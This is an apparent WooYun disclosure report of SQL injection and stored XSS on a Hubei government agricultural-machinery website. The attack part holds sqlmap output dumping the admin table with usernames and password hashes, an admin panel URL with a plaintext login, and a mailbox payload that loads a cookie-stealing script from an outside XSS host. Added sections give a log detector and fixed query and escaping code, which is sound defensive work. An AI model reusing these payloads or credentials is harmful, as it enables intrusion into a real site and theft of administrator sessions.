2015-03-02: Details have been sent to the vendor and are awaiting the vendor's handling
2015-03-06: Vendor has confirmed; details disclosed only to the vendor
2015-03-16: Details disclosed to core white hats and experts in related fields
2015-03-26: Details disclosed to ordinary white hats
2015-04-05: Details disclosed to intern white hats
2015-04-16: Details disclosed to the public
Hubei Provincial Agricultural Machinery Safety Supervision and Extension Information Network: stored XSS + SQL injection (cookies captured)
sql+xss
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classId=103 AND 6332=6332
---
[10:47:53] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:47:53] [ERROR] cannot retrieve column names, back-end DBMS is Access
[10:47:53] [INFO] fetching entries of column(s) 'classid, id, orderid, password, setting, username, usernmae' for table 'admin' in database 'Microsoft_Access_masterdb'
[10:47:53] [INFO] fetching number of column(s) 'classid, id, orderid, password,setting, username, usernmae' entries for table 'admin' in database 'Microsoft_Access_masterdb'
[10:47:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:47:53] [INFO] retrieved:
[10:47:54] [WARNING] reflective value(s) found and filtering out
3
[10:47:55] [INFO] heuristics detected web page charset 'GB2312'
[10:47:55] [INFO] fetching number of distinct values for column 'id'
[10:47:55] [INFO] retrieved: 3
[10:47:57] [INFO] using column 'id' as a pivot for retrieving row data
[10:47:57] [INFO] retrieved: 1
[10:48:01] [INFO] retrieved: 103
[10:48:12] [INFO] retrieved: 4
[10:48:16] [INFO] retrieved: 0
[10:48:19] [INFO] retrieved: e583273c626a4876
[10:49:01] [INFO] retrieved:
[10:49:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
hubeinongji
[10:49:52] [INFO] retrieved:
[10:49:53] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[10:49:53] [INFO] retrieved: 3
[10:49:57] [INFO] retrieved: 103
[10:50:05] [INFO] retrieved: 4
[10:50:09] [INFO] retrieved: 0
[10:50:12] [INFO] retrieved: 7a57a5a743894a0e
[10:51:03] [INFO] retrieved: fitdoing
[10:51:25] [INFO] retrieved:
[10:51:26] [INFO] retrieved: 4
[10:51:29] [INFO] retrieved: 103
[10:51:38] [INFO] retrieved: 4
[10:51:42] [INFO] retrieved: 0
[10:51:45] [INFO] retrieved: 39776a07e1c3a922
[10:52:30] [INFO] retrieved: hbnj
[10:52:42] [INFO] retrieved:
[10:52:43] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: Microsoft_Access_masterdb
Table: admin
[3 entries]
+----+---------+---------+---------+----------+-------------+------------------+
| id | classid | orderid | setting | usernmae | username    | password         |
+----+---------+---------+---------+----------+-------------+------------------+
| 1  | 103     | 4       | 0       | <blank>  | hubeinongji | e583273c626a4876 |
| 3  | 103     | 4       | 0       | <blank>  | fitdoing    | 7a57a5a743894a0e |
| 4  | 103     | 4       | 0       | <blank>  | hbnj        | 39776a07e1c3a922 |
+----+---------+---------+---------+----------+-------------+------------------+
[10:53:31] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file 'F:\SqlMap\Bin\output\www.hbnjjl.gov.cn\dump\Microsoft_Access_masterdb\admin.csv'
[10:53:31] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 784 times
[10:53:31] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\www.hbnjjl.gov.cn'
Injection point: http://www.hbnjjl.gov.cn/listDirect.asp?classId=102
ASP + Access, nothing much to say. The main thing is the other one: there is a webmaster mailbox.
The search box filters <.. but here, amazingly, nothing is filtered at all. Evil - -
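The sqlmap session above leaves a very recognisable trace on the server side: a numeric parameter (classId) that suddenly carries SQL keywords, and a burst of HTTP 500 responses from a single client (784 of them in the report). The following detector, added here as an example and not part of the original report, parses constructed IIS-style log lines and flags integer parameters that contain SQL syntax, while counting server errors per client. The log layout, the sample IP addresses and the INTEGER_PARAMS list are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample log lines in a simplified IIS W3C layout
# (date time client-ip method uri-stem uri-query status). They are
# invented to resemble the probing seen in the report, not real logs.
SAMPLE_LOG = """\
2015-03-02 10:47:50 203.0.113.5 GET /listDirect.asp classId=102 200
2015-03-02 10:47:51 203.0.113.5 GET /listDirect.asp classId=103%20AND%206332=6332 200
2015-03-02 10:47:52 203.0.113.5 GET /listDirect.asp classId=103%20AND%206332=6333 500
2015-03-02 10:47:53 203.0.113.5 GET /listDirect.asp classId=103' 500
2015-03-02 10:47:54 198.51.100.7 GET /listDirect.asp classId=105 200
2015-03-02 10:47:55 198.51.100.7 GET /search.asp keyword=tractor 200
"""

# Parameters this application expects to be plain integers (assumption:
# the report only shows classId; the other names are illustrative).
INTEGER_PARAMS = {"classid", "id", "orderid"}

# SQL fragments that have no business inside an integer parameter.
SQL_PATTERN = re.compile(
    r"(\bAND\b|\bOR\b|'|--|/\*|\bSELECT\b|\bUNION\b|\(|\))", re.IGNORECASE
)

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<path>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)


def parse_line(line):
    """Parse one log line into a dict; return None for lines we cannot read."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # parse_qs percent-decodes values and splits only on the first '=',
    # so 'classId=103%20AND%206332=6332' becomes {'classId': ['103 AND 6332=6332']}
    rec["params"] = parse_qs(rec["query"], keep_blank_values=True)
    return rec


def suspicious_params(params):
    """Return (name, value) pairs where an integer parameter carries SQL syntax."""
    hits = []
    for name, values in params.items():
        if name.lower() not in INTEGER_PARAMS:
            continue
        for value in values:
            if not value.isdigit() and SQL_PATTERN.search(value):
                hits.append((name, value))
    return hits


def analyze(log_text, error_threshold=2):
    """Aggregate per client IP: injection-looking requests and 5xx responses.

    A client is reported if it sent at least one suspicious request or
    triggered error_threshold or more server errors.
    """
    per_ip = defaultdict(lambda: {"injection_attempts": 0, "errors": 0, "examples": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        hits = suspicious_params(rec["params"])
        if hits:
            stats["injection_attempts"] += 1
            stats["examples"].append(hits[0][1])
        if rec["status"] >= 500:
            stats["errors"] += 1
    return {
        ip: stats
        for ip, stats in per_ip.items()
        if stats["injection_attempts"] or stats["errors"] >= error_threshold
    }


if __name__ == "__main__":
    for ip, stats in analyze(SAMPLE_LOG).items():
        print(ip, stats)
```

The error count matters on its own: boolean-blind probing against classic ASP usually produces a long run of 500s from one address even when the payload itself is not recognised, so the threshold catches variants the regex misses.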
</div><script>alert("wooyun")</script>
</textarea>'"><script src=http://webxss.net/A6JnLp?1425178565></script>
The admin account and password were already obtained above.. went straight in to have a look.. Admin panel: http://www.hbnjjl.gov.cn/adminManage/ username: fitdoing password: admin
Found the webmaster mailbox!
Cookies received too.
Fix: filter.
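"Filter" covers two different sinks in this report: the classId parameter that reaches an Access query unquoted, and the mailbox message that is written back into the page unencoded. The example below, added here and not code from the report or the site, puts the defective pattern next to the hardened one for each. It uses sqlite3 as a stand-in for the site's Access database (an assumption so the example runs offline), a template that mimics the textarea the report's payload breaks out of, and constructed table rows; the column names follow the dump above.

```python
import html
import re
import sqlite3

# Constructed stand-in for the site's Access database. sqlite3 is used
# because it ships with Python; usernames are placeholders, not the dump's.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, classid INTEGER, username TEXT)")
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?)",
        [(1, 103, "user_a"), (3, 103, "user_b"), (4, 102, "user_c")],
    )
    return conn


def lookup_vulnerable(conn, raw_class_id):
    """String concatenation, the classic-ASP habit behind the report's finding.

    'classId=103 AND 6332=6332' keeps returning rows while '... AND 6332=6333'
    returns none: that difference is the boolean-blind oracle sqlmap used.
    """
    sql = "SELECT id, username FROM admin WHERE classid = " + raw_class_id
    return conn.execute(sql).fetchall()


def parse_class_id(raw):
    """Accept only a plain non-negative integer of sane length; reject the rest."""
    if not re.fullmatch(r"[0-9]{1,9}", raw or ""):
        raise ValueError("classId must be an integer")
    return int(raw)


def is_valid_class_id(raw):
    try:
        parse_class_id(raw)
        return True
    except ValueError:
        return False


def lookup_safe(conn, raw_class_id):
    """Validated integer plus a bound parameter: the value can never become SQL."""
    class_id = parse_class_id(raw_class_id)
    return conn.execute(
        "SELECT id, username FROM admin WHERE classid = ?", (class_id,)
    ).fetchall()


# Stored XSS: the mailbox body is rendered inside a textarea, which is why
# the report's payload starts by closing </textarea>. Encoding on output
# neutralises it without maintaining a tag blacklist (assumed template).
MESSAGE_TEMPLATE = '<div class="msg"><textarea readonly>{body}</textarea></div>'


def render_message_vulnerable(body):
    return MESSAGE_TEMPLATE.format(body=body)


def render_message_safe(body):
    # quote=True also encodes " and ' so an attribute context is covered too.
    return MESSAGE_TEMPLATE.format(body=html.escape(body, quote=True))


def contains_live_script(markup):
    """True if an unencoded <script tag appears anywhere in the markup."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    db = build_demo_db()
    print(lookup_vulnerable(db, "103 AND 6332=6332"))   # rows come back
    print(lookup_vulnerable(db, "103 AND 6332=6333"))   # nothing: the oracle
    print(is_valid_class_id("103 AND 6332=6332"))       # False: rejected early
    payload = '</div><script>alert("wooyun")</script>'
    print(render_message_safe(payload))
```

Validation and parameter binding are complementary: the integer check fails fast with a 400 instead of the 500s sqlmap saw, and the bound parameter protects any future code path that forgets the check. For the mailbox, the escaping belongs at output time, in every place the message is displayed, including the admin panel where the report's cookie-stealing script actually fired.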
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-03-06 17:32
CNVD confirms the described situation; it has been forwarded via CNCERT to the regional sub-center, which will coordinate handling with the website's operating unit.
None yet